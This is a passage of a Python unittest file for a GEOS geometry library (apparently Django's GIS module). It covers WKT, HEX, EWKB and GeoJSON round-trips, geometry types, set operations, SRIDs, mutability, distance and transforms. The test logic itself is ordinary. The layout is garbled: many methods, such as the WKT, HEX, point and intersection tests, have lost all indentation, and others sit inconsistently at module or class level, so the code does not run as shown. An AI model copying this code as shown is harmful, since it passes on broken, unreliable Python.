            # Equivalent to `fg.ptr`
            self.assertRaises(GEOSException, fg._get_ptr)
        # Anything that is either not None or the acceptable pointer type will
        # result in a TypeError when trying to assign it to the `ptr` property.
        # Thus, memory addresses (integers) and pointers of the incorrect type
        # (in `bad_ptrs`) will not be allowed.
        bad_ptrs = (5, ctypes.c_char_p('foobar'))
        for bad_ptr in bad_ptrs:
            # Equivalent to `fg.ptr = bad_ptr`
            self.assertRaises(TypeError, fg1._set_ptr, bad_ptr)
            self.assertRaises(TypeError, fg2._set_ptr, bad_ptr)
def test01a_wkt(self):
"Testing WKT output."
for g in self.geometries.wkt_out:
geom = fromstr(g.wkt)
self.assertEqual(g.ewkt, geom.wkt)
def test01b_hex(self):
"Testing HEX output."
for g in self.geometries.hex_wkt:
geom = fromstr(g.wkt)
self.assertEqual(g.hex, geom.hex)
    def test01b_hexewkb(self):
        "Testing (HEX)EWKB output."
        # NOTE(review): `buffer` below is the Python 2 builtin — this module
        # predates Python 3 support.
        from binascii import a2b_hex
        # For testing HEX(EWKB).
        ogc_hex = '01010000000000000000000000000000000000F03F'
        # `SELECT ST_AsHEXEWKB(ST_GeomFromText('POINT(0 1)', 4326));`
        hexewkb_2d = '0101000020E61000000000000000000000000000000000F03F'
        # `SELECT ST_AsHEXEWKB(ST_GeomFromEWKT('SRID=4326;POINT(0 1 2)'));`
        hexewkb_3d = '01010000A0E61000000000000000000000000000000000F03F0000000000000040'
        pnt_2d = Point(0, 1, srid=4326)
        pnt_3d = Point(0, 1, 2, srid=4326)
        # OGC-compliant HEX will not have SRID nor Z value.
        self.assertEqual(ogc_hex, pnt_2d.hex)
        self.assertEqual(ogc_hex, pnt_3d.hex)
        # HEXEWKB should be appropriate for its dimension -- have to use an
        # a WKBWriter w/dimension set accordingly, else GEOS will insert
        # garbage into 3D coordinate if there is none.  Also, GEOS has a
        # a bug in versions prior to 3.1 that puts the X coordinate in
        # place of Z; an exception should be raised on those versions.
        self.assertEqual(hexewkb_2d, pnt_2d.hexewkb)
        if GEOS_PREPARE:
            self.assertEqual(hexewkb_3d, pnt_3d.hexewkb)
            self.assertEqual(True, GEOSGeometry(hexewkb_3d).hasz)
        else:
            # Pre-3.1 GEOS: 3D HEXEWKB export must raise.
            try:
                hexewkb = pnt_3d.hexewkb
            except GEOSException:
                pass
            else:
                self.fail('Should have raised GEOSException.')
        # Same for EWKB.
        self.assertEqual(buffer(a2b_hex(hexewkb_2d)), pnt_2d.ewkb)
        if GEOS_PREPARE:
            self.assertEqual(buffer(a2b_hex(hexewkb_3d)), pnt_3d.ewkb)
        else:
            try:
                ewkb = pnt_3d.ewkb
            except GEOSException:
                pass
            else:
                self.fail('Should have raised GEOSException')
        # Redundant sanity check.
        self.assertEqual(4326, GEOSGeometry(hexewkb_2d).srid)
def test01c_kml(self):
"Testing KML output."
for tg in self.geometries.wkt_out:
geom = fromstr(tg.wkt)
kml = getattr(tg, 'kml', False)
if kml: self.assertEqual(kml, geom.kml)
    def test01d_errors(self):
        "Testing the Error handlers."
        # string-based: malformed WKT must raise, never crash.
        print("\nBEGIN - expecting GEOS_ERROR; safe to ignore.\n")
        for err in self.geometries.errors:
            try:
                g = fromstr(err.wkt)
            except (GEOSException, ValueError):
                pass
        # Bad WKB
        self.assertRaises(GEOSException, GEOSGeometry, buffer('0'))
        print("\nEND - expecting GEOS_ERROR; safe to ignore.\n")
        class NotAGeometry(object):
            pass
        # Some other object
        self.assertRaises(TypeError, GEOSGeometry, NotAGeometry())
        # None
        self.assertRaises(TypeError, GEOSGeometry, None)
def test01e_wkb(self):
"Testing WKB output."
from binascii import b2a_hex
for g in self.geometries.hex_wkt:
geom = fromstr(g.wkt)
wkb = geom.wkb
self.assertEqual(b2a_hex(wkb).upper(), g.hex)
def test01f_create_hex(self):
"Testing creation from HEX."
for g in self.geometries.hex_wkt:
geom_h = GEOSGeometry(g.hex)
# we need to do this so decimal places get normalised
geom_t = fromstr(g.wkt)
self.assertEqual(geom_t.wkt, geom_h.wkt)
def test01g_create_wkb(self):
"Testing creation from WKB."
from binascii import a2b_hex
for g in self.geometries.hex_wkt:
wkb = buffer(a2b_hex(g.hex))
geom_h = GEOSGeometry(wkb)
# we need to do this so decimal places get normalised
geom_t = fromstr(g.wkt)
self.assertEqual(geom_t.wkt, geom_h.wkt)
def test01h_ewkt(self):
"Testing EWKT."
srids = (-1, 32140)
for srid in srids:
for p in self.geometries.polygons:
ewkt = 'SRID=%d;%s' % (srid, p.wkt)
poly = fromstr(ewkt)
self.assertEqual(srid, poly.srid)
self.assertEqual(srid, poly.shell.srid)
self.assertEqual(srid, fromstr(poly.ewkt).srid) # Checking export
    def test01i_json(self):
        "Testing GeoJSON input/output (via GDAL)."
        # GeoJSON support requires GDAL with GeoJSON enabled; skip otherwise.
        if not gdal or not gdal.GEOJSON: return
        for g in self.geometries.json_geoms:
            geom = GEOSGeometry(g.wkt)
            # Fixtures flagged `not_equal` have JSON that differs textually
            # from GEOS output, so only the round-trip is compared for them.
            if not hasattr(g, 'not_equal'):
                self.assertEqual(g.json, geom.json)
                self.assertEqual(g.json, geom.geojson)
            self.assertEqual(GEOSGeometry(g.wkt), GEOSGeometry(geom.json))
    def test01k_fromfile(self):
        "Testing the fromfile() factory."
        from io import BytesIO
        ref_pnt = GEOSGeometry('POINT(5 23)')
        # Build one in-memory "file" holding WKT and one holding WKB.
        wkt_f = BytesIO()
        wkt_f.write(ref_pnt.wkt)
        wkb_f = BytesIO()
        wkb_f.write(str(ref_pnt.wkb))
        # Other tests use `fromfile()` on string filenames so those
        # aren't tested here.
        for fh in (wkt_f, wkb_f):
            fh.seek(0)
            pnt = fromfile(fh)
            self.assertEqual(ref_pnt, pnt)
    def test01k_eq(self):
        "Testing equivalence."
        p = fromstr('POINT(5 23)')
        self.assertEqual(p, p.wkt)
        self.assertNotEqual(p, 'foo')
        ls = fromstr('LINESTRING(0 0, 1 1, 5 5)')
        self.assertEqual(ls, ls.wkt)
        # NOTE(review): this compares `p` (not `ls`) against 'bar' — possibly
        # `ls` was intended; confirm against upstream before changing.
        self.assertNotEqual(p, 'bar')
        # Error shouldn't be raised on equivalence testing with
        # an invalid type.
        for g in (p, ls):
            self.assertNotEqual(g, None)
            self.assertNotEqual(g, {'foo' : 'bar'})
            self.assertNotEqual(g, False)
def test02a_points(self):
"Testing Point objects."
prev = fromstr('POINT(0 0)')
for p in self.geometries.points:
# Creating the point from the WKT
pnt = fromstr(p.wkt)
self.assertEqual(pnt.geom_type, 'Point')
self.assertEqual(pnt.geom_typeid, 0)
self.assertEqual(p.x, pnt.x)
self.assertEqual(p.y, pnt.y)
self.assertEqual(True, pnt == fromstr(p.wkt))
self.assertEqual(False, pnt == prev)
# Making sure that the point's X, Y components are what we expect
self.assertAlmostEqual(p.x, pnt.tuple[0], 9)
self.assertAlmostEqual(p.y, pnt.tuple[1], 9)
# Testing the third dimension, and getting the tuple arguments
if hasattr(p, 'z'):
self.assertEqual(True, pnt.hasz)
self.assertEqual(p.z, pnt.z)
self.assertEqual(p.z, pnt.tuple[2], 9)
tup_args = (p.x, p.y, p.z)
set_tup1 = (2.71, 3.14, 5.23)
set_tup2 = (5.23, 2.71, 3.14)
else:
self.assertEqual(False, pnt.hasz)
self.assertEqual(None, pnt.z)
tup_args = (p.x, p.y)
set_tup1 = (2.71, 3.14)
set_tup2 = (3.14, 2.71)
# Centroid operation on point should be point itself
self.assertEqual(p.centroid, pnt.centroid.tuple)
# Now testing the different constructors
pnt2 = Point(tup_args) # e.g., Point((1, 2))
pnt3 = Point(*tup_args) # e.g., Point(1, 2)
self.assertEqual(True, pnt == pnt2)
self.assertEqual(True, pnt == pnt3)
# Now testing setting the x and y
pnt.y = 3.14
pnt.x = 2.71
self.assertEqual(3.14, pnt.y)
self.assertEqual(2.71, pnt.x)
# Setting via the tuple/coords property
pnt.tuple = set_tup1
self.assertEqual(set_tup1, pnt.tuple)
pnt.coords = set_tup2
self.assertEqual(set_tup2, pnt.coords)
prev = pnt # setting the previous geometry
    def test02b_multipoints(self):
        "Testing MultiPoint objects."
        for mp in self.geometries.multipoints:
            mpnt = fromstr(mp.wkt)
            self.assertEqual(mpnt.geom_type, 'MultiPoint')
            self.assertEqual(mpnt.geom_typeid, 4)
            self.assertAlmostEqual(mp.centroid[0], mpnt.centroid.tuple[0], 9)
            self.assertAlmostEqual(mp.centroid[1], mpnt.centroid.tuple[1], 9)
            # Out-of-range indexing must raise, not crash.
            self.assertRaises(GEOSIndexError, mpnt.__getitem__, len(mpnt))
            self.assertEqual(mp.centroid, mpnt.centroid.tuple)
            self.assertEqual(mp.coords, tuple(m.tuple for m in mpnt))
            # Every member of the collection is a valid, non-empty Point.
            for p in mpnt:
                self.assertEqual(p.geom_type, 'Point')
                self.assertEqual(p.geom_typeid, 0)
                self.assertEqual(p.empty, False)
                self.assertEqual(p.valid, True)
    def test03a_linestring(self):
        "Testing LineString objects."
        prev = fromstr('POINT(0 0)')
        for l in self.geometries.linestrings:
            ls = fromstr(l.wkt)
            self.assertEqual(ls.geom_type, 'LineString')
            self.assertEqual(ls.geom_typeid, 1)
            self.assertEqual(ls.empty, False)
            self.assertEqual(ls.ring, False)
            if hasattr(l, 'centroid'):
                self.assertEqual(l.centroid, ls.centroid.tuple)
            if hasattr(l, 'tup'):
                self.assertEqual(l.tup, ls.tuple)
            self.assertEqual(True, ls == fromstr(l.wkt))
            self.assertEqual(False, ls == prev)
            # Out-of-range indexing must raise, not crash.
            self.assertRaises(GEOSIndexError, ls.__getitem__, len(ls))
            prev = ls
            # Creating a LineString from a tuple, list, and numpy array
            self.assertEqual(ls, LineString(ls.tuple))  # tuple
            self.assertEqual(ls, LineString(*ls.tuple)) # as individual arguments
            self.assertEqual(ls, LineString([list(tup) for tup in ls.tuple])) # as list
            self.assertEqual(ls.wkt, LineString(*tuple(Point(tup) for tup in ls.tuple)).wkt) # Point individual arguments
            if numpy: self.assertEqual(ls, LineString(numpy.array(ls.tuple))) # as numpy array
    def test03b_multilinestring(self):
        "Testing MultiLineString objects."
        prev = fromstr('POINT(0 0)')
        for l in self.geometries.multilinestrings:
            ml = fromstr(l.wkt)
            self.assertEqual(ml.geom_type, 'MultiLineString')
            self.assertEqual(ml.geom_typeid, 5)
            self.assertAlmostEqual(l.centroid[0], ml.centroid.x, 9)
            self.assertAlmostEqual(l.centroid[1], ml.centroid.y, 9)
            self.assertEqual(True, ml == fromstr(l.wkt))
            self.assertEqual(False, ml == prev)
            prev = ml
            # Every member is a non-empty LineString.
            for ls in ml:
                self.assertEqual(ls.geom_type, 'LineString')
                self.assertEqual(ls.geom_typeid, 1)
                self.assertEqual(ls.empty, False)
            # Out-of-range indexing must raise, not crash.
            self.assertRaises(GEOSIndexError, ml.__getitem__, len(ml))
            # Reconstructing from clones and from raw coordinate tuples must
            # round-trip.
            self.assertEqual(ml.wkt, MultiLineString(*tuple(s.clone() for s in ml)).wkt)
            self.assertEqual(ml, MultiLineString(*tuple(LineString(s.tuple) for s in ml)))
    def test04_linearring(self):
        "Testing LinearRing objects."
        for rr in self.geometries.linearrings:
            lr = fromstr(rr.wkt)
            self.assertEqual(lr.geom_type, 'LinearRing')
            self.assertEqual(lr.geom_typeid, 2)
            self.assertEqual(rr.n_p, len(lr))
            self.assertEqual(True, lr.valid)
            self.assertEqual(False, lr.empty)
            # Creating a LinearRing from a tuple, list, and numpy array
            self.assertEqual(lr, LinearRing(lr.tuple))
            self.assertEqual(lr, LinearRing(*lr.tuple))
            self.assertEqual(lr, LinearRing([list(tup) for tup in lr.tuple]))
            if numpy: self.assertEqual(lr, LinearRing(numpy.array(lr.tuple)))
    def test05a_polygons(self):
        "Testing Polygon objects."
        # Testing `from_bbox` class method
        bbox = (-180, -90, 180, 90)
        p = Polygon.from_bbox( bbox )
        self.assertEqual(bbox, p.extent)
        prev = fromstr('POINT(0 0)')
        for p in self.geometries.polygons:
            # Creating the Polygon, testing its properties.
            poly = fromstr(p.wkt)
            self.assertEqual(poly.geom_type, 'Polygon')
            self.assertEqual(poly.geom_typeid, 3)
            self.assertEqual(poly.empty, False)
            self.assertEqual(poly.ring, False)
            self.assertEqual(p.n_i, poly.num_interior_rings)
            self.assertEqual(p.n_i + 1, len(poly)) # Testing __len__
            self.assertEqual(p.n_p, poly.num_points)
            # Area & Centroid
            self.assertAlmostEqual(p.area, poly.area, 9)
            self.assertAlmostEqual(p.centroid[0], poly.centroid.tuple[0], 9)
            self.assertAlmostEqual(p.centroid[1], poly.centroid.tuple[1], 9)
            # Testing the geometry equivalence
            self.assertEqual(True, poly == fromstr(p.wkt))
            self.assertEqual(False, poly == prev) # Should not be equal to previous geometry
            self.assertEqual(True, poly != prev)
            # Testing the exterior ring
            ring = poly.exterior_ring
            self.assertEqual(ring.geom_type, 'LinearRing')
            self.assertEqual(ring.geom_typeid, 2)
            if p.ext_ring_cs:
                self.assertEqual(p.ext_ring_cs, ring.tuple)
                self.assertEqual(p.ext_ring_cs, poly[0].tuple) # Testing __getitem__
            # Testing __getitem__ and __setitem__ on invalid indices
            self.assertRaises(GEOSIndexError, poly.__getitem__, len(poly))
            self.assertRaises(GEOSIndexError, poly.__setitem__, len(poly), False)
            self.assertRaises(GEOSIndexError, poly.__getitem__, -1 * len(poly) - 1)
            # Testing __iter__
            for r in poly:
                self.assertEqual(r.geom_type, 'LinearRing')
                self.assertEqual(r.geom_typeid, 2)
            # Testing polygon construction.
            self.assertRaises(TypeError, Polygon.__init__, 0, [1, 2, 3])
            self.assertRaises(TypeError, Polygon.__init__, 'foo')
            # Polygon(shell, (hole1, ... holeN))
            rings = tuple(r for r in poly)
            self.assertEqual(poly, Polygon(rings[0], rings[1:]))
            # Polygon(shell_tuple, hole_tuple1, ... , hole_tupleN)
            ring_tuples = tuple(r.tuple for r in poly)
            self.assertEqual(poly, Polygon(*ring_tuples))
            # Constructing with tuples of LinearRings.
            self.assertEqual(poly.wkt, Polygon(*tuple(r for r in poly)).wkt)
            self.assertEqual(poly.wkt, Polygon(*tuple(LinearRing(r.tuple) for r in poly)).wkt)
    def test05b_multipolygons(self):
        "Testing MultiPolygon objects."
        print("\nBEGIN - expecting GEOS_NOTICE; safe to ignore.\n")
        # NOTE(review): `prev` is assigned but never used in this method —
        # apparently copied from the sibling tests; confirm before removal.
        prev = fromstr('POINT (0 0)')
        for mp in self.geometries.multipolygons:
            mpoly = fromstr(mp.wkt)
            self.assertEqual(mpoly.geom_type, 'MultiPolygon')
            self.assertEqual(mpoly.geom_typeid, 6)
            self.assertEqual(mp.valid, mpoly.valid)
            # Structural checks only apply to the valid fixtures.
            if mp.valid:
                self.assertEqual(mp.num_geom, mpoly.num_geom)
                self.assertEqual(mp.n_p, mpoly.num_coords)
                self.assertEqual(mp.num_geom, len(mpoly))
                self.assertRaises(GEOSIndexError, mpoly.__getitem__, len(mpoly))
                for p in mpoly:
                    self.assertEqual(p.geom_type, 'Polygon')
                    self.assertEqual(p.geom_typeid, 3)
                    self.assertEqual(p.valid, True)
                self.assertEqual(mpoly.wkt, MultiPolygon(*tuple(poly.clone() for poly in mpoly)).wkt)
        print("\nEND - expecting GEOS_NOTICE; safe to ignore.\n")
    def test06a_memory_hijinks(self):
        "Testing Geometry __del__() on rings and polygons."
        #### Memory issues with rings and polygons
        # These tests are needed to ensure sanity with writable geometries.
        # Getting a polygon with interior rings, and pulling out the interior rings
        poly = fromstr(self.geometries.polygons[1].wkt)
        ring1 = poly[0]
        ring2 = poly[1]
        # These deletes should be 'harmless' since they are done on child geometries
        del ring1
        del ring2
        ring1 = poly[0]
        ring2 = poly[1]
        # Deleting the polygon
        del poly
        # Access to these rings is OK since they are clones.
        # (If they shared the parent's C pointer this would segfault.)
        s1, s2 = str(ring1), str(ring2)
def test08_coord_seq(self):
"Testing Coordinate Sequence objects."
for p in self.geometries.polygons:
if p.ext_ring_cs:
# Constructing the polygon and getting the coordinate sequence
poly = fromstr(p.wkt)
cs = poly.exterior_ring.coord_seq
self.assertEqual(p.ext_ring_cs, cs.tuple) # done in the Polygon test too.
self.assertEqual(len(p.ext_ring_cs), len(cs)) # Making sure __len__ works
# Checks __getitem__ and __setitem__
for i in xrange(len(p.ext_ring_cs)):
c1 = p.ext_ring_cs[i] # Expected value
c2 = cs[i] # Value from coordseq
self.assertEqual(c1, c2)
# Constructing the test value to set the coordinate sequence with
if len(c1) == 2: tset = (5, 23)
else: tset = (5, 23, 8)
cs[i] = tset
# Making sure every set point matches what we expect
for j in range(len(tset)):
cs[i] = tset
self.assertEqual(tset[j], cs[i][j])
def test09_relate_pattern(self):
"Testing relate() and relate_pattern()."
g = fromstr('POINT (0 0)')
self.assertRaises(GEOSException, g.relate_pattern, 0, 'invalid pattern, yo')
for rg in self.geometries.relate_geoms:
a = fromstr(rg.wkt_a)
b = fromstr(rg.wkt_b)
self.assertEqual(rg.result, a.relate_pattern(b, rg.pattern))
self.assertEqual(rg.pattern, a.relate(b))
def test10_intersection(self):
"Testing intersects() and intersection()."
for i in xrange(len(self.geometries.topology_geoms)):
a = fromstr(self.geometries.topology_geoms[i].wkt_a)
b = fromstr(self.geometries.topology_geoms[i].wkt_b)
i1 = fromstr(self.geometries.intersect_geoms[i].wkt)
self.assertEqual(True, a.intersects(b))
i2 = a.intersection(b)
self.assertEqual(i1, i2)
self.assertEqual(i1, a & b) # __and__ is intersection operator
a &= b # testing __iand__
self.assertEqual(i1, a)
def test11_union(self):
"Testing union()."
for i in xrange(len(self.geometries.topology_geoms)):
a = fromstr(self.geometries.topology_geoms[i].wkt_a)
b = fromstr(self.geometries.topology_geoms[i].wkt_b)
u1 = fromstr(self.geometries.union_geoms[i].wkt)
u2 = a.union(b)
self.assertEqual(u1, u2)
self.assertEqual(u1, a | b) # __or__ is union operator
a |= b # testing __ior__
self.assertEqual(u1, a)
def test12_difference(self):
"Testing difference()."
for i in xrange(len(self.geometries.topology_geoms)):
a = fromstr(self.geometries.topology_geoms[i].wkt_a)
b = fromstr(self.geometries.topology_geoms[i].wkt_b)
d1 = fromstr(self.geometries.diff_geoms[i].wkt)
d2 = a.difference(b)
self.assertEqual(d1, d2)
self.assertEqual(d1, a - b) # __sub__ is difference operator
a -= b # testing __isub__
self.assertEqual(d1, a)
def test13_symdifference(self):
"Testing sym_difference()."
for i in xrange(len(self.geometries.topology_geoms)):
a = fromstr(self.geometries.topology_geoms[i].wkt_a)
b = fromstr(self.geometries.topology_geoms[i].wkt_b)
d1 = fromstr(self.geometries.sdiff_geoms[i].wkt)
d2 = a.sym_difference(b)
self.assertEqual(d1, d2)
self.assertEqual(d1, a ^ b) # __xor__ is symmetric difference operator
a ^= b # testing __ixor__
self.assertEqual(d1, a)
    def test14_buffer(self):
        "Testing buffer()."
        for bg in self.geometries.buffer_geoms:
            g = fromstr(bg.wkt)
            # The buffer we expect
            exp_buf = fromstr(bg.buffer_wkt)
            quadsegs = bg.quadsegs
            width = bg.width
            # Can't use a floating-point for the number of quadsegs.
            self.assertRaises(ctypes.ArgumentError, g.buffer, width, float(quadsegs))
            # Constructing our buffer
            buf = g.buffer(width, quadsegs)
            self.assertEqual(exp_buf.num_coords, buf.num_coords)
            self.assertEqual(len(exp_buf), len(buf))
            # Now assuring that each point in the buffer is almost equal
            for j in xrange(len(exp_buf)):
                exp_ring = exp_buf[j]
                buf_ring = buf[j]
                self.assertEqual(len(exp_ring), len(buf_ring))
                for k in xrange(len(exp_ring)):
                    # Asserting the X, Y of each point are almost equal (due to floating point imprecision)
                    self.assertAlmostEqual(exp_ring[k][0], buf_ring[k][0], 9)
                    self.assertAlmostEqual(exp_ring[k][1], buf_ring[k][1], 9)
def test15_srid(self):
    "Testing the SRID property and keyword across geometry types."
    # Testing SRID keyword on Point
    pnt = Point(5, 23, srid=4326)
    self.assertEqual(4326, pnt.srid)
    pnt.srid = 3084
    self.assertEqual(3084, pnt.srid)
    # SRID must be an integer, not a string.
    self.assertRaises(ctypes.ArgumentError, pnt.set_srid, '4326')
    # Testing SRID keyword on fromstr(), and on Polygon rings.
    poly = fromstr(self.geometries.polygons[1].wkt, srid=4269)
    self.assertEqual(4269, poly.srid)
    for ring in poly: self.assertEqual(4269, ring.srid)
    poly.srid = 4326
    self.assertEqual(4326, poly.shell.srid)
    # Testing SRID keyword on GeometryCollection
    gc = GeometryCollection(Point(5, 23), LineString((0, 0), (1.5, 1.5), (3, 3)), srid=32021)
    self.assertEqual(32021, gc.srid)
    for i in range(len(gc)): self.assertEqual(32021, gc[i].srid)
    # GEOS may get the SRID from HEXEWKB
    # 'POINT(5 23)' at SRID=4326 in hex form -- obtained from PostGIS
    # using `SELECT GeomFromText('POINT (5 23)', 4326);`.
    hex = '0101000020E610000000000000000014400000000000003740'
    p1 = fromstr(hex)
    self.assertEqual(4326, p1.srid)
    # In GEOS 3.0.0rc1-4 when the EWKB and/or HEXEWKB is exported,
    # the SRID information is lost and set to -1 -- this is not a
    # problem on the 3.0.0 version (another reason to upgrade).
    exp_srid = self.null_srid
    p2 = fromstr(p1.hex)
    self.assertEqual(exp_srid, p2.srid)
    p3 = fromstr(p1.hex, srid=-1) # -1 is intended.
    self.assertEqual(-1, p3.srid)
def test16_mutable_geometries(self):
    "Testing the mutability of Polygons and Geometry Collections."
    ### Testing the mutability of Polygons ###
    for p in self.geometries.polygons:
        poly = fromstr(p.wkt)
        # Should only be able to use __setitem__ with LinearRing geometries.
        self.assertRaises(TypeError, poly.__setitem__, 0, LineString((1, 1), (2, 2)))
        # Constructing the new shell by adding 500 to every point in the old shell.
        shell_tup = poly.shell.tuple
        new_coords = []
        for point in shell_tup: new_coords.append((point[0] + 500., point[1] + 500.))
        new_shell = LinearRing(*tuple(new_coords))
        # Assigning polygon's exterior ring w/the new shell
        poly.exterior_ring = new_shell
        s = str(new_shell) # new shell is still accessible after assignment
        self.assertEqual(poly.exterior_ring, new_shell)
        self.assertEqual(poly[0], new_shell)
    ### Testing the mutability of Geometry Collections
    for tg in self.geometries.multipoints:
        mp = fromstr(tg.wkt)
        for i in range(len(mp)):
            # Creating a random point.
            pnt = mp[i]
            new = Point(random.randint(1, 100), random.randint(1, 100))
            # Testing the assignment
            mp[i] = new
            s = str(new) # what was used for the assignment is still accessible
            self.assertEqual(mp[i], new)
            self.assertEqual(mp[i].wkt, new.wkt)
            self.assertNotEqual(pnt, mp[i])
    # MultiPolygons involve much more memory management because each
    # Polygon w/in the collection has its own rings.
    for tg in self.geometries.multipolygons:
        mpoly = fromstr(tg.wkt)
        for i in xrange(len(mpoly)):
            poly = mpoly[i]
            old_poly = mpoly[i]
            # Offsetting the each ring in the polygon by 500.
            for j in xrange(len(poly)):
                r = poly[j]
                for k in xrange(len(r)): r[k] = (r[k][0] + 500., r[k][1] + 500.)
                poly[j] = r
            self.assertNotEqual(mpoly[i], poly)
            # Testing the assignment
            mpoly[i] = poly
            s = str(poly) # Still accessible
            self.assertEqual(mpoly[i], poly)
            self.assertNotEqual(mpoly[i], old_poly)
    # Extreme (!!) __setitem__ -- no longer works, have to detect
    # in the first object that __setitem__ is called in the subsequent
    # objects -- maybe mpoly[0, 0, 0] = (3.14, 2.71)?
    #mpoly[0][0][0] = (3.14, 2.71)
    #self.assertEqual((3.14, 2.71), mpoly[0][0][0])
    # Doing it more slowly..
    #self.assertEqual((3.14, 2.71), mpoly[0].shell[0])
    #del mpoly
def test17_threed(self):
    "Testing three-dimensional geometries (Point and LineString)."
    # Testing a 3D Point
    pnt = Point(2, 3, 8)
    self.assertEqual((2.,3.,8.), pnt.coords)
    # Assigning a 2D tuple to a 3D point must fail.
    self.assertRaises(TypeError, pnt.set_coords, (1.,2.))
    pnt.coords = (1.,2.,3.)
    self.assertEqual((1.,2.,3.), pnt.coords)
    # Testing a 3D LineString
    ls = LineString((2., 3., 8.), (50., 250., -117.))
    self.assertEqual(((2.,3.,8.), (50.,250.,-117.)), ls.tuple)
    self.assertRaises(TypeError, ls.__setitem__, 0, (1.,2.))
    ls[0] = (1.,2.,3.)
    self.assertEqual((1.,2.,3.), ls[0])
def test18_distance(self):
    "Testing the distance() function."
    # Distance to self should be 0.
    pnt = Point(0, 0)
    self.assertEqual(0.0, pnt.distance(Point(0, 0)))
    # Distance should be 1
    self.assertEqual(1.0, pnt.distance(Point(0, 1)))
    # Distance should be ~ sqrt(2)
    self.assertAlmostEqual(1.41421356237, pnt.distance(Point(1, 1)), 11)
    # Distances are from the closest vertex in each geometry --
    # should be 3 (distance from (2, 2) to (5, 2)).
    ls1 = LineString((0, 0), (1, 1), (2, 2))
    ls2 = LineString((5, 2), (6, 1), (7, 0))
    self.assertEqual(3, ls1.distance(ls2))
def test19_length(self):
    "Testing the length property across geometry types."
    # Points have 0 length.
    pnt = Point(0, 0)
    self.assertEqual(0.0, pnt.length)
    # Should be ~ sqrt(2)
    ls = LineString((0, 0), (1, 1))
    self.assertAlmostEqual(1.41421356237, ls.length, 11)
    # Should be circumference of Polygon (unit square -> 4)
    poly = Polygon(LinearRing((0, 0), (0, 1), (1, 1), (1, 0), (0, 0)))
    self.assertEqual(4.0, poly.length)
    # Should be sum of each element's length in collection.
    mpoly = MultiPolygon(poly.clone(), poly)
    self.assertEqual(8.0, mpoly.length)
def test20a_emptyCollections(self):
    "Testing empty geometries and collections (len, num_geom, __getitem__)."
    gc1 = GeometryCollection([])
    gc2 = fromstr('GEOMETRYCOLLECTION EMPTY')
    pnt = fromstr('POINT EMPTY')
    ls = fromstr('LINESTRING EMPTY')
    poly = fromstr('POLYGON EMPTY')
    mls = fromstr('MULTILINESTRING EMPTY')
    mpoly1 = fromstr('MULTIPOLYGON EMPTY')
    mpoly2 = MultiPolygon(())
    for g in [gc1, gc2, pnt, ls, poly, mls, mpoly1, mpoly2]:
        self.assertEqual(True, g.empty)
        # Testing len() and num_geom -- semantics differ by geometry type.
        if isinstance(g, Polygon):
            self.assertEqual(1, len(g)) # Has one empty linear ring
            self.assertEqual(1, g.num_geom)
            self.assertEqual(0, len(g[0]))
        elif isinstance(g, (Point, LineString)):
            self.assertEqual(1, g.num_geom)
            self.assertEqual(0, len(g))
        else:
            self.assertEqual(0, g.num_geom)
            self.assertEqual(0, len(g))
        # Testing __getitem__ (doesn't work on Point or Polygon)
        if isinstance(g, Point):
            self.assertRaises(GEOSIndexError, g.get_x)
        elif isinstance(g, Polygon):
            lr = g.shell
            self.assertEqual('LINEARRING EMPTY', lr.wkt)
            self.assertEqual(0, len(lr))
            self.assertEqual(True, lr.empty)
            self.assertRaises(GEOSIndexError, lr.__getitem__, 0)
        else:
            self.assertRaises(GEOSIndexError, g.__getitem__, 0)
def test20b_collections_of_collections(self):
    "Testing GeometryCollection handling of other collections."
    # Creating a GeometryCollection WKT string composed of other
    # collections and polygons.
    coll = [mp.wkt for mp in self.geometries.multipolygons if mp.valid]
    coll.extend([mls.wkt for mls in self.geometries.multilinestrings])
    coll.extend([p.wkt for p in self.geometries.polygons])
    coll.extend([mp.wkt for mp in self.geometries.multipoints])
    gc_wkt = 'GEOMETRYCOLLECTION(%s)' % ','.join(coll)
    # Should construct ok from WKT
    gc1 = GEOSGeometry(gc_wkt)
    # Should also construct ok from individual geometry arguments.
    gc2 = GeometryCollection(*tuple(g for g in gc1))
    # And, they should be equal.
    self.assertEqual(gc1, gc2)
def test21_test_gdal(self):
    "Testing `ogr` and `srs` properties."
    # Skip silently when GDAL support is not compiled in.
    if not gdal.HAS_GDAL: return
    g1 = fromstr('POINT(5 23)')
    self.assertEqual(True, isinstance(g1.ogr, gdal.OGRGeometry))
    self.assertEqual(g1.srs, None)
    g2 = fromstr('LINESTRING(0 0, 5 5, 23 23)', srid=4326)
    self.assertEqual(True, isinstance(g2.ogr, gdal.OGRGeometry))
    self.assertEqual(True, isinstance(g2.srs, gdal.SpatialReference))
    self.assertEqual(g2.hex, g2.ogr.hex)
    self.assertEqual('WGS 84', g2.srs.name)
def test22_copy(self):
    "Testing use with the Python `copy` module."
    import copy
    poly = GEOSGeometry('POLYGON((0 0, 0 23, 23 23, 23 0, 0 0), (5 5, 5 10, 10 10, 10 5, 5 5))')
    cpy1 = copy.copy(poly)
    cpy2 = copy.deepcopy(poly)
    # Both copies must wrap their own underlying GEOS pointer.
    self.assertNotEqual(poly._ptr, cpy1._ptr)
    self.assertNotEqual(poly._ptr, cpy2._ptr)
def test23_transform(self):
    "Testing `transform` method with SRID, SpatialReference and CoordTransform."
    if not gdal.HAS_GDAL: return
    orig = GEOSGeometry('POINT (-104.609 38.255)', 4326)
    trans = GEOSGeometry('POINT (992385.4472045 481455.4944650)', 2774)
    # Using a srid, a SpatialReference object, and a CoordTransform object
    # for transformations.
    t1, t2, t3 = orig.clone(), orig.clone(), orig.clone()
    t1.transform(trans.srid)
    t2.transform(gdal.SpatialReference('EPSG:2774'))
    ct = gdal.CoordTransform(gdal.SpatialReference('WGS84'), gdal.SpatialReference(2774))
    t3.transform(ct)
    # Testing use of the `clone` keyword.
    k1 = orig.clone()
    k2 = k1.transform(trans.srid, clone=True)
    self.assertEqual(k1, orig)
    self.assertNotEqual(k1, k2)
    # Compare to 3 decimal places; projected coordinates are approximate.
    prec = 3
    for p in (t1, t2, t3, k2):
        self.assertAlmostEqual(trans.x, p.x, prec)
        self.assertAlmostEqual(trans.y, p.y, prec)
def test23_transform_noop(self):
    """ Testing `transform` method (SRID match).

    NOTE(review): the method name repeats the `test23_` prefix used by
    the previous test; both still run, but the numbering is misleading.
    """
    # transform() should no-op if source & dest SRIDs match,
    # regardless of whether GDAL is available.
    if gdal.HAS_GDAL:
        g = GEOSGeometry('POINT (-104.609 38.255)', 4326)
        gt = g.tuple
        g.transform(4326)
        self.assertEqual(g.tuple, gt)
        self.assertEqual(g.srid, 4326)
